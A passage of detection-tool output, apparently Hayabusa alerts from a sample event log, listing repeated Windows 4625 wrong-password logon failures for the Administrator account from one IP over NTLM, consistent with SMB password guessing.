NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.856 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.939 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.980 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.014 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.103 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.151 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.198 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.404 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.530 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.692 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.058 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.133 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.386 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.419 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.540 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.627 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.746 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.786 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.866 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.255 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.502 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.659 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.787 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.823 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.912 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 